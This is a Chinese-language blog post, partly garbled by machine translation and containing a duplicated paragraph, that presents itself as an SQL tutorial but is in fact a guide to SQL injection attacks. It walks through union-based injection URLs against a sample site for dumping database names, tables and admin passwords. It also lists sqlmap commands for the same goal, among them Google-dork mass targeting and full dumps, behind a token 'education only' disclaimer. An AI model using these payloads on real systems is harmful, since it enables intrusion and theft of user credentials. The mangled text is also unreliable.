SQL超级详细的使用教程

article/2025/9/22 21:57:35

SQL超级详细的使用教程

免责声明本篇文章仅用于教育,请不要在中华人民共和国境内使用本文章内容,出事与作者无关
1.SQL 漏洞

SQL 的概念字面意思是“结构化查询语言”。换句话说,存在查询-响应关系。例如,在社交媒体应用程序或电子商务网站中,您在注册时输入的用户名和密码将保存在数据库中,并且在您下次登录过程中,系统会尝试通过查询数据库来匹配您的用户名和密码组合。如果匹配,您可以输入,如果不匹配,则不能。因此,SQL 数据库使用请求-响应引擎。
在这里插入图片描述
1.1 什么是SQL漏洞?

正如我上面所说,数据库具有标准的语法类型,就像软件语言一样,并且某些系统漏洞的出现与编写这些数据库的软件开发人员所犯的逻辑错误一致。出现SQL漏洞的主要原因是,它不查询用户的请求,就向用户给出了相应的响应。不幸的是,无论对这个漏洞如何掉以轻心,在数据安全方面,它可能不会给公司带来好的结果。因为,由于 SQL 注入漏洞,您可以在没有 root 权限的情况下使用数据库定向所需的请求并获得所需的响应。

在这里插入图片描述1.2 如何检测SQL漏洞?

这是一个在 SQL 注入站点 URL 中很明显的漏洞。当然,由于在这里分享这些网站是不道德的,如果我们 example-site.com 展示它们;

https://www.example-site.com/page.php?id=5
我们在末尾看到的“page.php?id=x”结构存在于所有SQL注入漏洞中。但是,并非所有具有此语句的系统都可能存在 SQL 漏洞。

我们正在谈论的这句话实际上是通往数据库的网关,为了做到这一点,我们需要逃离入口处的安全。这就是我们伪装的原因。此操作意味着使用引号 (') 转义字符串部分。此过程后将遇到的错误可能如下所示:

您的 SQL 语法有错误;检查与您的 MariaDB 服务器版本对应的手册,了解在第 1 行的“index.php?id=2”附近使用的正确语法
如果有这个错误,就存在SQL漏洞,我什至可以说以下内容;如果页面图像发生更改,则很有可能存在该漏洞。

在这里插入图片描述
1.3 如何利用SQL漏洞?

假设我们找到一个存在 SQL 漏洞的目标站点,有很多方法可以利用这个漏洞。使用一些工具(我稍后会讨论它)或手动。首先,让我们看看什么是手动 sql。

在这里插入图片描述

1.3.1 手动 SQL 利用
http://www.hedefitemiz.com/ product.php?id=4
http://www.hedefsitemiz.com/ product.php?id=4’ (We left quotation marks on the page, there is a sql deficit if there is an error, data loss, etc. on the page.)
http://www.hedefsitemiz.com/ÜRÜN.php?id=4’ order by 1 – - (Increment the “1” Number Next to the Order By Command until Error Gets) Let’s say we got the error at 5
http://www.hedefsitemiz.com/ product.php?id=-4’ union select 1,2,3,4 – - after doing this, let’s say the number 3 is reflected on the page, a number between 1 and 5 needs to be reflected on the page 3 Let’s say reflected

http://www.hedefitemiz.com/ product.php?id=4http://www.hedefsitemiz.com/ 产品.php?id=4
’ (我们在页面上留下了引号,如果页面上出现错误、数据丢失等,则存在 sql 赤字。
http://www.hedefsitemiz.com/ÜRÜN.php?id=4’ 顺序 1 – - (递增 Order By 命令旁边的“1”数字,直到出现错误) 假设我们在 5 http://www.hedefsitemiz.com/ 产品.php?id=-4’ 联合选择 1,2,3,4 – - 执行此操作后,假设数字 3 反映在页面上,需要反映在页面上 1 到 5
之间的数字 3 假设反映。

http://www.hedefsitemiz.com/product.php?id=-4’ union select 1,2,version(),4 – -

使用此代码,我们可以了解版本信息。
http://www.hedefsitemiz.com/product.php?id=-4’ union select 1,2,database(),4 – -

使用此代码,我们可以学习数据库名称。

如何找到表名?:
http://www.hedefsitemiz.com/product.php?id=-4’ union select 1,2, table_name,4 from information_schema.tables – -

让我们从这里找到管理表,假设表名是admin,我们如何从information_schema.列中拉出它
http://www.hedefsitemiz.com/product.php?id=-4’ union select 1,2, column_name,4 from information_schema.columns where table_name=admin – -

这样我们拉取管理表

每次输出用户名、密码、id时,我们如何拉取它们?

http://www.hedefsitemiz.com/ product.php?id=-4’ union select 1,2, password,4 from admin – -

您可以像这样获取密码,如果您删除密码并输入用户名,

您还可以拉取用户名部分。

在这里插入图片描述

1.3.2 使用 SQL 工具进行利用 这里的 SQL 工具

是指使利用 SQL 漏洞更容易的工具。例如 havij、sqlmap 等。

如果我们谈论 Havij 车辆,我不会详细介绍。无论如何,这是一个简单的工具。那些想详细阅读的人可以看看这个话题;

每个人都知道SQLMap工具。它是近年来最常用和最有效的工具之一。Sqlmap是一种使用python语言编写的黑客工具,利用数据库漏洞并转储数据库信息。
在这里插入图片描述用法和参数

Sqlmap是一个非常简单有效的工具,适合初学者使用。让我们通过示例解释此工具中使用的一些参数来了解 sqlmap 的工作原理。

选项选项卡
-h /–help:这是我们打印简单帮助和使用功能的命令。
-hh:这是我们打印高级帮助和使用功能的命令。
-v:这是我们的详细命令,默认情况下定义为 1,我们指定它在 sqlmap 运行时向我们显示的输出的显示。它的范围从 0 到 6。0 返回最少的输出,而 6 返回最多的输出。

“目标”选项卡

这是我们的类别,其中包含用于选择目标所需的参数。必须至少选择一个。

-u, –url:如果我们没有对数据库的直接访问权限并且我们想尝试注入,这是我们可以使用的命令。

示例用法:
sqlmap -u “http://www.website.com/test.php?id=1”
-g:这是我们的命令,允许我们使用 Google dork 在具有特定模式的站点上执行测试。

示例用法:
sqlmap -g “.php?id=”

注入选项卡:

这是我们的类别,我们可以在其中进行调整,例如要测试的参数、个人有效负载定义和篡改脚本定义。

–dbms:为了帮助sqlmap,如果我们知道后端运行的数据库管理系统,我们可以用dbms定义它。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –dbms=“MySql”
–篡改:如果用户和后端数据库之间存在弱访问控制,则我们的参数用于通过 WAF 传递要注入的字符串。它将采用的参数来自 sqlmap 文件夹中的篡改文件夹。

示例用法:
sqlmap -u “www.siteadi.com/testet.php?id=1″ –tamper=”between”
–前缀:这是我们的参数,我们可以通过在有效负载前面添加我们想要的值来进一步自定义要测试的参数。

示例用法:
sqlmap -u “www.siteadi.com/testet.php?ad=test” –prefix “‘)”

枚举选项卡:

这是我们的类别,其中包含我们将用于通知数据库管理系统的参数。它用于提取表中的数据并获取信息。

–all:这是同时执行所有参数的命令。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –all

–users:这是我们可以用来列出数据库管理系统用户的参数。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –users

–passwords:如果当前用户有权读取系统表,它可以帮助我们散列密码。对于此操作,Sqlmap 首先拉取用户。然后它尝试拉取传递哈希。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –

–dbs:如果当前用户有权读取系统表,则我们的参数是检索数据库名称。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –dbs

–tables:如果当前用户有权读取系统表,则我们的参数允许我们提取所选数据库中的所有表。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –tables
sqlmap -u “www.sitename.com/testet.php?id=1” -D databasename –tables:如果当前用户有权读取系统表,则我们的参数允许我们从所选数据库中的选定表

中提取所有列。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” –columns sqlmap -u “www.sitename.com/testet.php?id=1” -D databaseName -T tableName –columns

–dump:如果我们想转储数据库或表的内容,可以使用这个参数。

示例用法:
sqlmap -u “www.sitename.com/testet.php?id=1” -D databaseName -T tableName –dump注意使用–dump已经触犯法律


http://chatgpt.dhexx.cn/article/wn32c64C.shtml

相关文章

SQL注入 基础概述及相关知识

SQL注入 基础概述及相关知识 SQL注入概述SQL注入攻击简介SQL注入攻击原理SQL注入攻击来源SQL注入攻击主要特点SQL注入攻击危害 SQL注入攻击SQL注入攻击基础概述SQL注入威胁表达方式SQL注入典型攻击手段SQL攻击的种类划分按照注入点类型分类按照数据提交方式分类按照执行效果分类…

加固你的数据防线:避免成为SQL注入攻击的下一个目标

SQL注入是一种常见的Web应用程序安全漏洞,攻击者利用该漏洞通过构造恶意的SQL查询语句,以执行未经授权的操作或获取敏感数据。本文将介绍SQL注入的概念、攻击原理以及常见的防范方案,帮助开发人员和系统管理员加强对Web应用程序的安全性。 1、…

2021年6月10日08点53分 SQL注入

1、SQL注入基础 1.1、SQL注入基础 SQL注入( SQL Injection ):程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果…

cookie中转注入

目标地址 www.jzvales.com/jzvales/ProductShow.asp?ID568 首先,我们添加单引号进行注入判断,结果显示如下 熟悉***的朋友都知道该网站是使用了通用的防注入,只是过滤了post参数,但是没有过滤cookie参数,所以我们使用…

vim使用教程

简介 Vim是一个类似于Vi的著名的功能强大、高度可定制的文本编辑器,在Vi的基础上改进和增加了很多特性。(主要是Vi/Vim属于Linux命令行必备软件)。 下载&安装 下载 可前往官网下载 安装 Windows安装exe可执行文件即可Linux ubuntu系…

十大关系数据库SQL注入工具一览

众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。 BSQL Hacker BSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工…

那些年我们一起追逐过的安全工具

前言 每一段岁月,都会留下属于时代的记忆——那些年,我们所追逐与热衷的安全工具,亦是如此。 在那个信息不对称的年代,安全工具主要是在小圈子内传播。当年天真的我们(脚本小子),以为网络就是江…

浅谈SQL注入攻击与防御(适用于小白观看)

首先什么是SQL注入攻击 SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,没有对浏览器端提交的参数进行严格的过滤和判断。用户可以修改构造参数,提交SQL查询语句&…

网络安全系列之三十七 Pangolin(穿山甲)和Havij(胡萝卜)的使用

在***过程中,必然要借助于一些工具软件,像明小子和啊D都属于比较古老的软件,功能有限,而Pangolin和Havij则是两款相对功能比较强大的软件,本文将介绍它们的基本用法。实验环境采用NMPServer搭建,使用其中的…

Havij 1.152 最新破解版

Havij是一款自动化的SQL注入工具,它能够帮助渗透测试人员发现和利用Web应用程序的SQL注入漏洞。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层…

基于PHPCMS的SQL注入(Havij)

本教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险。 目录 实验目的实验环境实验原理实验步骤第一步靶机操作第二步渗透主机操作 实验总结 实验目的 通过本实验理解SQL注入基本原理和过程,掌握菜刀和Havij等注入工具的使用…

黑客学习-SQL注入:利用Havij对PHPCMS网站进行SQL注入

SQL注入用户通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,网站应用程序未经过过滤,将恶意SQL语句带入数据库进行执行,通过数据库获取了敏感的信息或者执行了其他恶意操作。 由于SQL语句本身多样性,以及可用于构造的SQ…

42. 注入篇——Havij、Pangolin使用

前言 本小节主要讲解在渗透测试工程中使用到的两款攻击——Havij、Pangolin Havij Havij(简称:胡萝卜):是一款用于sql注入的工具,他支持MySQL、MSSql、Oracle、Sybase等数据库,而且可以支持盲注、代理、…

html交互视频如何制作,H5交互视频如何实现?

视频类作为现在H5运用最频繁的形式之一,单一化的形式已经让用户产生了疲劳效果。而交互式视频的出现则打破了视频H5一直以来的模式,赋予了用户强烈的感官体验,将视觉和触觉融合为了一体,使得体验效果更具有吸引力。 那H5视频带交互…

Unity 制作360全景视频 全景图片流程

Recorder的使用 在Unity制作360图片或者视频需要用到UnityPackage:Recorder 如果没有就在Package Manager寻找 1、在菜单栏找到Window/General/Recorder/RecorderWindow 参数说明: Animation Clip:录制动画剪辑 Movie:录制视频 Image Sequence&a…

爱剪辑怎么制作淘宝视频?详细的制作技巧,教你快速搞定淘宝主图视频

众所周知,现在打开淘宝购买某种产品时,在主界面上方展示产品的部分已经出现了视频。这也是顺应潮流的做法,通过制作短视频的方式来展示产品,能引起买家更多的兴趣和购买欲。所以很多卖家现在都会制作一个精美的淘宝主图视频,来吸引顾客。 那么如何快速制作一个精美的淘宝…

MATLAB制作动图或视频

(来点有用的)MATLAB制作动图或视频 主要函数介绍情况一:对数据进行操作情况二:对界面进行操作其他 by HPC_ZY 在CSDN发现一个类似的居然要VIP才能查看,顿时有点无语,所以自己做了一个。 如题,MA…

使用Android制作视频播放器

使用Android制作视屏播放器 目录 使用Android制作视屏播放器前言一、展示预览二、详细步骤1.准备工作2、主界面设计3、主界面java文件4、全屏界面设计 总结 前言 Android小作业,含实现本地视频播放界面,实现全屏播放视频界面,两个界面所采用…

自制计算机教程视频教程,教学视频如何制作/怎么做视频

随着网络的普及,电脑上已经不再单单只有影视剧等由专业人士拍摄与制作的高精良视频,越来越多的普通人也将自己的一些人生小经验或者将一些自己所擅长的知识领域制作成教学视频传入网上,甚至有些老师都将自己所讲授的课程录制成视频传入网上&a…

画中画视频如何制作

最近网络上很流行这个种画中画视频,如何自己可以制作出来一个令人满意画中画视频呢,其他很简单哦,只要找到方法就可以制作出来,不用羡慕别人呢,自己也可以呢,小编现在分享下操作步骤,看下大家有…